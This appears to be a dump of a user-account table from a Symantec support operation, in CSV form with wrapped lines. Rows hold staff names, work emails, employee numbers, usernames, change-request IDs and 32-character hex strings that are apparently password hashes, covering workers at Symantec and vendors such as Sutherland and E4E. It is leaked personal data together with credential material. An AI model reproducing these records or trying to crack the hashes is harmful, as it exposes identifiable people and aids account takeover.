9a7-46f7-b88d-8b14443956e3,<blank>,<blank>,nisarg.kapadia@symantec.ts.e4e.com,E4
E,f12377976d7c48d8d2f6e74bd8817ebb,Chandresh,<blank>,Nisarg_Chandresh,Nisarg,NUL
L,NULL,NULL
f729-4e01-9a56-b2d0016bbc7d,CRQ000000265666--VMD--26/5/2011,000-000,tools_id@sym
antec.suth.com,Sutherland,477e6823f0cd8668b0a03690c7d5b50d,Rali,<blank>,089227,T
ej,NULL,NULL,NULL
f1fe-4159-837a-dde684ca9357,CRQ000000265666--vmd--26/05/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,0a770e6fe17b59b759dc67fe4c1361a4,Devarajulu,<blank>,1
13891,Rammohan,NULL,NULL,NULL
f478-49c0-821e-71bb2d1341b9,PM - 5/30/2011 - CRQ000000267126,<blank>,tools_id@sy
mantec.suth.com,<blank>,9f72400ca8c72d3ab0ff9e6ba2feaf81,Ahmed,<blank>,116571,As
rar,NULL,NULL,NULL
3de1-4443-920d-b2005bff8d6a,sms 29,INC137437,tools_id@symantec.suth.com,sutherla
nd,3aa088d138702829cb4b03c43265fdb9,Nair,<blank>,089040,Vipin Krishnan,NULL,NULL
,NULL
8c44-471b-8efc-57d5b7408033,PM - 5/30/2011 - CRQ000000267150,<blank>,tools_id@sy
mantec.suth.com,<blank>,1cfc9f8045ff6bac0bbe1f8d53fbd74c,S M B,<blank>,116573,Sa
ngeetha Raj,NULL,NULL,NULL
a28-483d-8d48-b74a6db6e464,<blank>,<blank>,pramod.kanangot@symantec.ts.e4e.com,E
4E,d53a78ca81e6033004df866e88a1b793,K,<blank>,Pramod_K,Pramod,NULL,NULL,NULL
9ed9-4ccb-bb71-06d90da45ce4,<blank>,<blank>,tools_id@symantec.suth.com,RM-23 Jan
2012-CRQ000000518152,455e7a37de50c306380aeb89df4e9e46,Villanueva,<blank>,124178
,Angely,NULL,NULL,NULL
a0b3-4131-801d-44771b874b9d,"CRQ000000719859 CLNP July 04,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,d2d1f98336e10f462d4c2e310fa30461,Purswani,<bl
ank>,227494,Subhash,NULL,NULL,NULL
4cad-4e78-9650-a5675b34f056,CRQ000000721263--vmd--05/07/2012,<blank>,suraj_nayak
@suth.com,sutherland,fdf527e55f5e75b00b184e0d1855eb58,Nayak,<blank>,227361,Suraj
,NULL,NULL,NULL
b591-4daf-bf23-ca9f7072bf68,sms 29,EMPROV,Tools_Id@Symantec.Suth.com,Sutherland,
828e948a1f98cd7fb16265f2559b3b32,NS,<blank>,089037,Sreejith,NULL,NULL,NULL
b53-495a-9f80-a51bd765d779,<blank>,<blank>,santosh.raghavan@symantec.ts.e4e.com,
E4E,3d95cbfe00910c2f199191f6ee6e70f7,Raghavan,<blank>,Santhosh_Raghavan,Santhosh
,NULL,NULL,NULL
2beb-4f01-b921-d8d68898111e,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
724015 - PR - 9th July 2012,ca6833bea8bac1f66743d11fd1cf5caa,Selvaraj,<blank>,22
7154,Vignesh ,NULL,NULL,NULL
fda-4ed1-bb49-156435f2a5b0,<blank>,<blank>,shilpa.gowda@symantec.ts.e4e.com,E4E,
51b880677f80c1bdd6d00c64e4987c4d,BS,<blank>,Shilpa_BS,Shilpa,NULL,NULL,NULL
63d-44b8-a2d6-465776262b50,<blank>,<blank>,sivalingam.nambiraj@symantec.ts.e4e.c
om,E4E,fa141a16dfc3df67c76b10eef5d48c51,Nambirajan,<blank>,Sivalingam_Nambirajan
,Sivalingam,NULL,NULL,NULL
1762-4af9-afbd-83aa2245598b,"CRQ000000830079 CLNP Oct 08,2012",000-0000,joshuapa
ul_galzote@symantec.com,Symantec,5717783b067344fbe9f7844ea9203ae1,Galzote,<blank
>,230615,Joshua Paul,NULL,NULL,NULL
8d5a-4121-b6ce-3a85ffa4ad3c,<blank>,<blank>,tools_id@symantec.suth.com,Sutherlan
d,78c62b6170c058ddab49d28e6f28ad8e,N,<blank>,093587,Mohammed Adil,NULL,NULL,NULL
2853-451f-9bac-cd8feb6b94b3,<blank>,<blank>,Ninofranco_Rivero@SPI.COM,PM - 6/14/
2012 - CRQ000000694688,aae9dd22d33305ec19ba40c7d721aa0f,Rivero,<blank>,226751,Ni
\xf1o Franco,NULL,NULL,NULL
3bb-4f4c-985e-5953be70b3b5,<blank>,<blank>,micheal.alphons@ts.e4e.com,E4E,b94fa8
d43614224feff128e29afdefd3,Alphons,<blank>,Michael_Alphons,Michael,NULL,NULL,NUL
L
8bde-4c69-85d0-c2d0ab0c98d4,<blank>,<blank>,tools_id@symantec.suth.com,RM-23 Jan
2012-CRQ000000518133,a58794f037814939eff114d22153475c,Medina,<blank>,124173,Don
naFaith ,NULL,NULL,NULL
29d5-4982-8ab7-96b78667cb44,CRQ000000265000--VMD--25/05/2011,<blank>,Aditya_Jaya
nthy@symantec.com,SYMANTEC,1e0a29acb55a70342eb045c880d81d8a,Jayanthy,<blank>,114
654,Aditya,NULL,NULL,NULL
f5f2-4d8d-9b93-8cdd68f6eac4,CRQ000000518278--vmd--24/01/2012,000-000,tools_id@sy
mantec.suth.com,Sutherland,d010312c8375c9601a34fda8f7444662,OCamince,<blank>,099
758,Michael,NULL,NULL,NULL
62fb-49ce-aaa4-bb8dfdc642d6,CRQ000000265000--VMD--25/05/2011,<blank>,Praveen_T@s
ymantec.com,SYMANTEC,9d6c54e40ebb40ba40d69fe81ac9c60c,T,<blank>,114972,Praveen,N
ULL,NULL,NULL
0cd9-430b-9537-95ee76b6b2dd,CRQ000000518278--vmd--24/02/2012,000-000,tools_id@sy
mantec.suth.com,Sutherland,25d171a1dda550ea540cc1c922544372,BCabalinan,<blank>,0
99763,Dominic,NULL,NULL,NULL
ac8-4a3d-852e-9162937e7fba,<blank>,<blank>,venkatest.sa@symantec.ts.e4e.com,E4E,
83705f4c5128a47f38656c167df011f2,Sathyanarayan,<blank>,Venkatesh_Sathyanarayan,V
enkatesh,NULL,NULL,NULL
7120-41aa-840a-f85586a499f4,<blank>,<blank>,Kristoferrey_Alag@SPI.COM,PM - 6/14/
2012 - CRQ000000694699,e6a4748dd1f0cb2472a7140e5d05cce1,Alag,<blank>,226752,kris
tofer Rey,NULL,NULL,NULL
6a33-4b52-8f4b-bbdc53eb0848,PM - 7/3/2011,<blank>,tools_id@symantec.suth.com,<bl
ank>,0de23ec813ebef6d76432100b8b1c6cd,Das,<blank>,113664,Bicky,NULL,NULL,NULL
935a-46d3-b513-651fa25dc45a,"CRQ000000719837 CLNP July 04,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,72ceaa8e12c2a74ba355a19129ad467b,Seth,<blank>
,227487,Botham,NULL,NULL,NULL
e758-46f9-a352-96d015a54543,"CRQ000000830106 CLNP Oct 08,2012",000-0000,harold_g
omez@symantec.com,Symantec,61609f8f34babccadd718d47ea771e91,Gomez,<blank>,230590
,Harold,NULL,NULL,NULL
557-411d-b5e1-ff2325bfbc63,<blank>,<blank>,bilal.ahmad@symantec.ts.e4e.com,E4E,e
4a4478a24710fde2a3228e3801c28c3,Ahmed,<blank>,Bilal_Ahmed,Bilal,NULL,NULL,NULL
0313-4a1d-ac3f-315dd9fe4b17,"CRQ000000830123 CLNP Oct 08,2012",000-0000,carlito_
reambonanzaj@symantec.com,Symantec,ba07852fdb1075dfea6287ba62445921,Reambonanza
Jr,<blank>,230599,Carlito,NULL,NULL,NULL
a35-4382-bb50-33c0f72b37f0,<blank>,<blank>,farook.chowdhury@symantec.ts.e4e.com,
E4E,b334dbe077fa09e91e1360a4bb8c9cc7,Ahmed,<blank>,Farook Ahmed Chowdhury _Ahmed
,Farook Ahmed Chowdhury,NULL,NULL,NULL
959f-4e6c-bf64-8e6d052b2528,CRQ000000518278 SP 24 Jan 2012,000-0000,selvakumar_r
_c@symantec.suth.com,Sutherland,c2c405c4c8f7c58918528edecc365977,R,<blank>,09896
2,SelvaKumar,NULL,NULL,NULL
e63-4c9e-a05a-c2e329e09b5b,<blank>,<blank>,goutam.naik@symantec.ts.e4e.com,E4E,0
2a3b246d94b18ff1ab82474bb64de01,Naik,<blank>,Goutam Naik_Naik,Goutam Naik,NULL,N
ULL,NULL
c2d-42e0-adcd-aefd90b7ae4f,<blank>,<blank>,harikrishnan.k@symantec.ts.e4e.com,E4
E,47cef70fa33d884ddc8bca54bb2e0695,K,<blank>,Harikrishnan_K,Harikrishnan,NULL,NU
LL,NULL
48b-4bff-8181-b2ceac926441,<blank>,<blank>,kirti.ranjan@symantec.ts.e4e.com,E4E,
f5ab8040662fb633e45cc466309e4dd2,Ranjan,<blank>,Kirti_Ranjan,Kirti,NULL,NULL,NUL
L
30e-4ce3-8f3e-405b7b9befcd,<blank>,<blank>,malar.selvi@symantec.ts.e4e.com,E4E,d
c83706c5133521222065137ab76bb9f,Selvi,<blank>,Malar_Selvi,Malar,NULL,NULL,NULL
4d2-45b5-a677-ba967852f88d,<blank>,<blank>,mithun.raju@symantec.ts.e4e.com,E4E,e
bb58eda4d94708501dc602c16eda1b4,Raju,<blank>,Mithun_Raju,Mithun,NULL,NULL,NULL
7f4-48cd-8a77-71e735b43852,<blank>,<blank>,mohammad.v@symantec.ts.e4e.com,E4E,07
712752df068edee3cd4639192fee6a,Varas,<blank>,Mohammad_Varas,Mohammad,NULL,NULL,N
ULL
1fd-4543-a155-84ea193b5847,<blank>,<blank>,naveen.reddy@symantec.ts.e4e.com,E4E,
131801b38822e60554ec66732cdde692,Reddy,<blank>,Naveen_Reddy,Naveen,NULL,NULL,NUL
L
70c-428e-b623-92d8975196f8,<blank>,<blank>,niteen.chauhan@symantec.ts.e4e.com,E4
E,2dc7350ee4d33c52c4cb0361275e81e5,Chauhan,<blank>,Niteen_Chauhan,Niteen,NULL,NU
LL,NULL
156-41d5-9f4c-3d837c352c1d,<blank>,<blank>,partha.banerjee@symantec.ts.e4e.com,E
4E,5c38a1580b2977b3224307a6f955b611,Banerjee,<blank>,Partha_Banerjee,Partha,NULL
,NULL,NULL
800-4ff2-9117-22e9302c467a,<blank>,2633251,tools_id@symantec.suth.com,Symantec,b
223c3f4df2501b0edbcc5d70d94c95c,Thomas,<blank>,091209,Alex,NULL,NULL,NULL
989-4318-a9f1-9af6baf0d05d,<blank>,<blank>,harsha.vardhana@symantec.ts.e4e.com,E
4E,04f8633bf166ea55147817ed48d5f454,Vardhana,<blank>,Harsha_Vardhana,Harsha,NULL
,NULL,NULL
4bf8-44fd-b9a3-b5c126fdac2c,<blank>,EMPROV,guohua_xu@symantec.com,Symantec,4661f
96b4b0694c7844838718db711be,Xia,<blank>,093509,Xuepeng,NULL,NULL,NULL
0744-4b2b-84ce-6f351de87c02,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,s
utherland,3bcb7cedaaceb0a081f383a6cb69c6e7,Sulapas,<blank>,075481,Jackielou,NULL
,NULL,NULL
65d-4915-84a6-4fda5ca6d2f4,<blank>,<blank>,partha.sarathi@symantec.ts.e4e.com,E4
E,29b9987bb80cafd25508003778ad11f0,Sarathi,<blank>,Partha_Sarathi,Partha,NULL,NU
LL,NULL
d5a9-4ae4-bbd0-561aa47a3fee,"CRQ000000719846 CLNP July 04,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,27ed8d11825ee843611156510973279f,Pullarwar,<b
lank>,227489,Prasad,NULL,NULL,NULL
bdb-4c78-b6a0-6a78bb8bcf8c,<blank>,<blank>,punith.nadur@symantec.ts.e4e.com,E4E,
5a795b2f4cf8c0f70ac1060d6edb8fb8,Nadur,<blank>,Punith_Nadur,Punith,NULL,NULL,NUL
L
475-454b-b90c-895d68b5e067,<blank>,<blank>,raghu.prakash@symantec.ts.e4e.com,E4E
,d0abb57db0b3c0d1a78e115bf7d9122f,PrakashN,<blank>,Raghu_PrakashN,Raghu,NULL,NUL
L,NULL
9b1-4713-851a-05d547ff7f8a,<blank>,<blank>,rahul.kalyanpur@symantec.ts.e4e.com,E
4E,b831678f86d28918f83f185bf98d238a,Kalyanpur,<blank>,Rahul Kalyanpur_Kalyanpur,
Rahul Kalyanpur,NULL,NULL,NULL
b0b9-4c90-9ec8-982020406260,sms 29,INC213497,tools_id@symantec.suth.com,<blank>,
538016fa0f7fabfd104e4e982fad1172,Hibonada,<blank>,076168,Marben,NULL,NULL,NULL
1f86-4421-9c23-640d9ca73593,CRQ000000460045 SP 21 Dec 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,363515edb4f7e5818e52557ea8d45dd6,Castillo,<blank>,1231
92,Ralph Allan Dulay,NULL,NULL,NULL
b49-4cef-99ee-f1a871359946,<blank>,<blank>,ravi.mishra@symantec.ts.e4e.com,E4E,c
0dc4baa093cac92665583330ed0b2a4,Mishra,<blank>,Ravi_M,Ravi,NULL,NULL,NULL
f4b-4504-9346-c8326488af35,<blank>,<blank>,renjith.jacob@symantec.ts.e4e.com,E4E
,eb8ef305f4b6f279ae46115cf10c19f9,Jacob,<blank>,Renjith_Jacob,Renjith,NULL,NULL,
NULL
7e7-4f78-8863-760f32b15339,<blank>,<blank>,sabyasachi.sengupta@symantec.ts.e4e.c
om,E4E,fea1fffb8ac300ca2f2dd7faa475fd84,Sengupta,<blank>,Sabyasachi_Sengupta,Sab
yasachi,NULL,NULL,NULL
9c3-430b-b59f-0f311ecf7812,<blank>,<blank>,souptik.gupta@symantec.ts.e4e.com,E4E
,d333f2bc440982fe60f62eb65a4eae72,Gupta,<blank>,Souptik_Gupta,Souptik,NULL,NULL,
NULL
700c-4c50-8ef0-145b4401862b,CRQ000000721273--vmd--05/07/2012,<blank>,dhirendra_s
war@suth.com,sutherland,9701287cb4f5f1553da9c27f92674dd6,Swar,<blank>,227364,Dhi
rendra,NULL,NULL,NULL
abf-429f-a823-586af7c717ff,<blank>,<blank>,tools_id@symantec.suth.com,Symantec,c
d4a73cbed8090422cf505c45bd6f89b,Selvaraj,<blank>,091231,Narayanan,NULL,NULL,NULL
272-4da4-bcf6-888b187dcbc6,<blank>,<blank>,subrat.kumar@symantec.ts.e4e.com,E4E,
f465bd957326b416509b5cbe14d85764,Kumar,<blank>,Subrat_Kumar,Subrat,NULL,NULL,NUL
L
48c-4248-bae0-55a18ffd65e9,<blank>,<blank>,sudaroli.d@symantec.ts.e4e.com,E4E,a8
28c350491f5b3d689b237e7bec1afc,D,<blank>,Sudaroli_D,Sudaroli,NULL,NULL,NULL
474-48c4-8a9f-f57abedc70f7,<blank>,<blank>,ugam.singh@symantec.ts.e4e.com,E4E,8c
fa814b9fc43059e9e103dfc2945cb2,Singh,<blank>,Ugam_Singh,Ugam,NULL,NULL,NULL
e88-4b66-8929-a1fc15c0c2fe,<blank>,86333,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",6aaddb9bad5d39c5ae2c239f2b15d663,Gupta,<blank>,vivek_gupt
a2,Vivek,NULL,NULL,NULL
430-43c2-861d-9134bc57c8b2,<blank>,<blank>,abhishek.asthana@symantec.ts.e4e.com,
E4E,86deee57e1a7feb7f5b34c268b695094,Asthana,<blank>,Abhishek_Asthana,Abhishek,N
ULL,NULL,NULL
12b-4ace-b08b-b24089fa8768,<blank>,<blank>,yogesh.patole@symantec.ts.e4e.com,E4E
,4a0a536b45d864e8231c75d7216a5ac3,Vishnu,<blank>,Yogesh_Vishnu,Yogesh,NULL,NULL,
NULL
08af-4eda-94ab-17ce050c79ca,WS 26-07-2010,INC000000225859,tools_id@symantec.suth
.com,<blank>,b122bb6fcae7041cc248f05d479ee24e,Bhat,<blank>,074226,Raviraz,NULL,N
ULL,NULL
00c-4193-960e-891b0ffe4e22,<blank>,<blank>,kamaraj.s@symanteccs.chnts.e4e.com,E4
E,77c675d23e0cef4b2e30c529826207d5,S,<blank>,Kamaraj_S1,Kamaraj,NULL,NULL,NULL
b98b-476f-9cfd-34396609d650,<blank>,<blank>,tools_id@symantec.suth.com,RM-23 Jan
2012-CRQ000000518206,82d82ac7e75ca89e94468d32ee2b6a9a,Morales,<blank>,124188,Je
remiahEzra ,NULL,NULL,NULL
5f5-4799-8d9a-91fde94fe931,<blank>,<blank>,atul.anuragi@symantec.ts.e4e.com,E4E,
d6a25d4c11545293e1b4322adca62f14,Kumar,<blank>,Atul_Kumar,Atul,NULL,NULL,NULL
d8c3-428f-b79c-a50fb80ca8be,sms 29,EMPROV,Tools_Id@Symantec.Suth.Com,Sutherland,
d70f5d519fae974b1867b5a5cdeb57a3,Deb,<blank>,099150,AmitKumar,NULL,NULL,NULL
16d-4122-91bf-cfd5e4362a8a,<blank>,<blank>,mahaboob.pasha@symantec.ts.e4e.com,E4
E,5abe6e842288d7bc21b6d164e63178e7,Basha,<blank>,Mahaboob_Basha,Mahaboob,NULL,NU
LL,NULL
ec2-4ecd-ad70-40a047669846,<blank>,<blank>,nagasunder.s@symantec.ts.e4e.com,E4E,
484e3af9389f8377470de0779c8b08cb,Sharanappa,<blank>,Nagasunder_Sharanappa,Nagasu
nder,NULL,NULL,NULL
56d-415a-ad13-cb329fb9cbd5,<blank>,<blank>,sudarshan.karkera@symantec.ts.e4e.com
,E4E,3852cb560433aa6773df596ebf401af7,Karkera,<blank>,Sudarshan_Karkera,Sudarsha
n,NULL,NULL,NULL
421-4781-b135-c61d517f531b,<blank>,<blank>,sudheep.subramanian@symantec.ts.e4e.c
om,E4E,9cda8cea7825094fc66b1d65a3954018,K,<blank>,Sudheep_K,Sudheep,NULL,NULL,NU
LL
f835-4529-b9ba-f48ea3c662e7,<blank>,<blank>,hans_gonzalez@symntec.com,<blank>,ad
2567ed48821225bdee0add476702ba,Gonzalez ,<blank>,Hans_Gonzalez,Hans,NULL,NULL,NU
LL
6b7-4a73-82e8-3fc4aa646112,<blank>,<blank>,vandana.chhabra@symantec.ts.e4e.com,E
4E,38e5aef72e14a7d4054a44c693f02741,Chhabra,<blank>,Vandana_Chhabra,Vandana,NULL
,NULL,NULL
c20-4ddc-9f18-289f4bdbb99a,<blank>,<blank>,rajesh.p@symanteccs.chnts.e4e.com,E4E
,3701f4fae5cbc1be0c943e627b65331f,P,<blank>,Rajesh_P1,Rajesh,NULL,NULL,NULL
4dd2-4da0-a094-bb6d6568ba4a,<blank>,<blank>,boris_falconer@symantec.com,Symantec
,17555cf8b1a9b634ff8a0cd0a1b8bd48,Falconer,<blank>,boris_falconer,Boris,NULL,NUL
L,NULL
8bca-4ac6-9787-e555a221067c,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,f5bea74bd2ecec8f86b4575b042ab05f,G,<blank>,094376,Karthick,NULL,NULL,NULL
4e0-48a3-aa4f-131401efa03f,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,2647
5efc48ee225244097cc496e8012b,KumarV,<blank>,Dillip_KumarV,Dillip,NULL,NULL,NULL
4328-4de9-ba81-b2d7d5e47613,<blank>,<blank>,tools_id@symantec.suth.com,RM-23 Jan
2012-CRQ000000518209,4e18ebc171455ea07eadc90716b6f338,Obenza,<blank>,124189,She
rilyn ,NULL,NULL,NULL
2893-4150-b028-1c8d0d58a29d,CRQ000000220266 PBP 17/03/2011,<blank>,tools_id@syma
ntec.suth.com,<blank>,623165c5f2696e530fd95156975d0532,Ahmed,<blank>,113892,Syed
Suhaib,NULL,NULL,NULL
fafa-430e-be06-cc6f590639cb,<blank>,<blank>,tommy_borres@suth.com,CT - 28/06/201
2 - CRQ000000711796,38e8f09ab275f1bce74b5bc97cd37ee6,Borres,<blank>,227004,Tommy
,NULL,NULL,NULL
ef53-47e3-9ea4-501e8b341528,<blank>,<blank>,tools_id@symantec.suth.com,RM-23 Jan
2012-CRQ000000518213,d503006677bb1c6205f3167fb7b55756,Oronce,<blank>,124190,Ame
lito ,NULL,NULL,NULL
cbc-41e7-acca-73825550ecbe,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,0b82
afbedcd354f0d58691aada93969a,PriyaS,<blank>,Divya_PriyaS,Divya,NULL,NULL,NULL
e8a5-4dfb-a9aa-4d5da3dc95ad,"CRQ000000830093 CLNP Oct 08,2012",000-0000,marcus_m
urillo@symantec.com,Symantec,93267594a1b0d7d1e595506239a58b94,Murillo,<blank>,23
0582,Marcus,NULL,NULL,NULL
33e-4640-a063-8032e65a8b10,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,0389
9087a77f2136bd22984f4c785fd5,BS Gowda,<blank>,Shilpa_BSGowda,Shilpa,NULL,NULL,NU
LL
d86a-41c0-a67a-b871f604efb9,<blank>,<blank>,tools_id@symantec.suth.com,RM-23 Jan
2012-CRQ000000518267,1de6102fd4efbeb067c3a729534e2bf5,Ramos,<blank>,124192,Dovi
e ,NULL,NULL,NULL
d9a0-4c5d-bb60-b8a6a20dc46f,<blank>,<blank>,bryan_baskin@symantec.com,Symantec,1
2e6c331628c6d39f1bb1511cde84912,Baskin,<blank>,bryan_baskin,Brian,NULL,NULL,NULL
468-40b5-b536-41cbdd0741aa,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,bf9e
abcbfe7b634d42ceee4781b423a9,ChandraMadala,<blank>,Ravi_ChandraMadala,Ravi,NULL,
NULL,NULL
0be2-4269-967d-2b5c5bda78c0,<blank>,<blank>,tools_id@symantec.suth.com,RM-23 Jan
2012-CRQ000000518279,47c4da351e98b2a822501e0b56e6b389,Trinidad,<blank>,124194,E
rronJannell ,NULL,NULL,NULL
13e8-4b95-894a-2cf855769fb5,<blank>,<blank>,tristan_fernandez@suth.com,CT - 28/0
6/2012 - CRQ000000711799,350389e0ece9c1b4708b3f37210f6307,Fernandez,<blank>,2270
06,Tristan,NULL,NULL,NULL
3d1-4fd7-bb69-df13c2ad1393,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,2dfa
e2fda9dfaa4653f1345fac3ed921,Vivek Justin,<blank>,Anto_VivekJustin,Anto,NULL,NUL
L,NULL
07f-40ac-9aab-6304be1846e7,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,7751
8df4f891573a08be733e6ddcce6b,Sinha Arun Chandra Sinha,<blank>,Sabita_SinhaArunCh
andraSinha,Sabita,NULL,NULL,NULL
5f7-4d1d-b82d-4c2b290a44af,<blank>,<blank>,jaisuresh.satheesan@symantec.ts.e4e.c
om,E4E,d45ba2b87f5f8c0cf88e4bd0a7b04f9b,S,<blank>,Jaisuresh_S,Jaisuresh,NULL,NUL
L,NULL
e8f-4f4c-9100-39587c147312,<blank>,<blank>,jathin.james@symantec.ts.e4e.com,E4E,
6ac92e35be60f53766ca6f4923046a39,James,<blank>,Jathin_James,Jathin,NULL,NULL,NUL
L
ac3e-4dd6-8c86-6c5292f9a725,<blank>,<blank>,salvador_du\xa0jr@spi.com,CT - 22/06
/2012 - CRQ000000706108,978bd2aceb1909b4f7e4b200a9f068cb,Du\xa0 Jr.,<blank>,2271
78,Salvador,NULL,NULL,NULL
b2c-42be-98a8-c16675f9c61f,<blank>,<blank>,anubhav.jha@symantec.ts.e4e.com,E4E,9
c12fc681821afcf7627fd2bad4783e2,Jha,<blank>,Anubhav_Jha,Anubhav,NULL,NULL,NULL
670f-4e03-953c-096bdbd31aa9,CRQ000000718077--vmd--03/07/2012,<blank>,mohanapriya
_v@Suth.com,sutherland,a778acf26d7208f92dccf0cec37ec201,V,<blank>,227399,Mohanap
riya,NULL,NULL,NULL
da52-45db-9e19-2c81c43301fa,CRQ000000718084--vmd--03/07/2012,<blank>,sumeshshiv_
sankar@suth.com,sutherland,8e113eab12b0097028c38a26503694ad,Sankar,<blank>,22740
0,Sumesh Shiv,NULL,NULL,NULL
8df-414f-81c2-6b879cd6aca8,<blank>,<blank>,ravikumar.kudithini@symantec.ts.e4e.c
om,E4E,f600ec1b70417635029a9be811ab14fc,Kudithini,<blank>,Ravikumar_Kudithini,Ra
vikumar,NULL,NULL,NULL
3824-470c-bcab-924d1c8fa627,"CRQ000000830116 CLNP Oct 08,2012",000-0000,kristine
_leoncio@symantec.com,Symantec,4f39a5f6fa322b4f3baeec2a4b6b8db0,Leoncio,<blank>,
230597,Kristine,NULL,NULL,NULL
6c9-41d4-a2c7-768e8b38f6b9,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,438c
663c6ba9f5f0c647c1ca5479501e,Lenka,<blank>,Krishna_Lenka,Krishna,NULL,NULL,NULL
d5c-495c-a41d-32e28daeeeb8,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,25fd
63298d8c1bb80a8ee1eb8c49b90b,Abbas,<blank>,Syed_Abbas,Syed,NULL,NULL,NULL
c4c-48db-9c8e-ca8cb72033d5,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,565e
4f53ab48955d3855457d0e59f0a5,BashaG,<blank>,Mahaboob_BashaG,Mahaboob,NULL,NULL,N
ULL
1c0-45a5-b2ba-40be63e801f1,<blank>,89095,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",9db24d3849e8c5b1b9876d886f7f3e17,D,<blank>,chithra_d,Chit
hra,NULL,NULL,NULL
fd7-4d49-953f-76329514103b,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,4e67
2c839b02b7e587981928ebe8aedc,Alexander Manappallil,<blank>,John_AlexanderManappa
llil,John,NULL,NULL,NULL
8f1-46df-9c1f-7d0078a3f99b,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,65dd
73940f6c40766ea7a4d86dc2e646,Banerjee,<blank>,Partha_Banerjee1,Partha,NULL,NULL,
NULL
c08-417c-8b82-663225ccdcb5,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,0aec
94ff29600032c75d3ef703d8df13,Asthana,<blank>,Abhishek_Asthana1,Abhishek,NULL,NUL
L,NULL
6d3-4c69-8b2f-1813155ecc1b,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,632b
d4dee4c353d3d198a0f03f660427,Ahmed,<blank>,Kaleem_Ahmed1,Kaleem,NULL,NULL,NULL
c53-4874-92ee-a8a94665c503,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,febd
d7d8a17cd82a8ce1d6dba67fde3a,BS,<blank>,Prasad_BS1,Prasad,NULL,NULL,NULL
dd2-49e0-b24b-5b26ecf66483,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,7f8a
3fc3186709708d196c7dc1839566,Chandra,<blank>,Shailendra_Chandra1,Shailendra,NULL
,NULL,NULL
196-40ac-bc5a-ae5da9648b8d,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,421e
719e67588a39258a92836c346e19,D,<blank>,Sudaroli_D1,Sudaroli,NULL,NULL,NULL
a2b-4454-a1d0-c36edc6e30dd,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,fe8b
32eb20ecd7eb645f1946914ec537,Sengupta,<blank>,Sabyasachi_Sengupta1,Sabyasachi,NU
LL,NULL,NULL
b6c-4b7f-bd1b-77147b641ac1,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,9e89
0a85cce3ccbfbb66b417f5aebe0c,M,<blank>,Anoop_M1,Anoop,NULL,NULL,NULL
85d-43ba-99a6-dae9371f872d,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,e3ff
e6848df14533b29369b018157cb0,George,<blank>,Lovin_George1,Lovin,NULL,NULL,NULL
c41-47d0-a9e5-36d242f3d18e,<blank>,090906/2633284,Tools_id@symantec.suth.com,Sym
antec,80e2ff7efcc4bfc1cced57f4d25ceaf9,Bagdass,<blank>,babina_bagdass,Babina,NUL
L,NULL,NULL
f49d-4a52-a4c7-c8a79c4d4747,CRQ000000709695--vmd--26/06/2012,<blank>,sameer_josh
i1@suth.com,sutherland,e139c236f0935bc6180b565ecf2f5bec,Joshi,<blank>,115580,Sam
eer,NULL,NULL,NULL
2b9-49e8-8aab-eac0b7d75bfb,<blank>,<blank>,shailendra.yadav@symantec.ts.e4e.com,
E4E,e22dfa5a859b0dea0cc6cbca7be1a51f,Kumar,<blank>,Shailendra_Kumar,Shailendra,N
ULL,NULL,NULL
87a-4736-869e-91768986639f,<blank>,<blank>,smruti.s@symantec.ts.e4e.com,E4E,59f1
ae38e9dd500a1f356dfa75bacd38,S,<blank>,Smruthi_S,Smruthi,NULL,NULL,NULL
2112-4b67-9a93-5489d6797409,CRQ000000267167--VMD--30/052011,000-000,tools_id@sym
antec.suth.com,Sutherland,f0fb4efdd64bac330dc285285893f328,Purushothaman,<blank>
,116612,Kishore,NULL,NULL,NULL
904-4855-b6ef-39129d15ea01,<blank>,041682,LiTao_Yu@symantec.com,Symantec,edb23ef
53c0dcc26428975586ff76c5f,Yu,<blank>,li_tao_yu,LiTao,NULL,NULL,NULL
7701-4ef3-9151-852b4878d5ac,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,6c636999d1317e7d4ea93ccb5f2800bb,Budzarov,<blank>,086866,David,NULL,NULL,NULL
dc2d-40e8-8ed2-a372bcdc6d30,<blank>,<blank>,accounts@symantec.teleperformance.gr
,Teleperformance,0f61d53c725fb021457d6601fdd0e740,Patsiouras,<blank>,109569,Nika
laos,NULL,NULL,NULL
a19b-42ed-86e3-86fa8d99d591,<blank>,<blank>,Viswanathan_B@symantec.com,Symantec,
d5f947a530344b7642c6debe02d95f32,B,<blank>,111847,Viswanathan,NULL,NULL,NULL
632d-4492-9caa-8555ee9e29be,<blank>,<blank>,Yamini_R@symantec.com,Symantec,a57df
0f2884c38714db76af7f18d020c,R,<blank>,111812,Yamini,NULL,NULL,NULL
a92-4fb9-acb6-5e99a5fa2fdd,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,463b
eca266009a7a8816590f55ccf5db,BM ,<blank>,Arifulla_BM1,Arifulla,NULL,NULL,NULL
01d-4b3b-9570-9133e58d233b,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,dea6
876ea062d30a5b4f41933d03b357,Bala,<blank>,Sakthi_Bala1,Sakthi,NULL,NULL,NULL
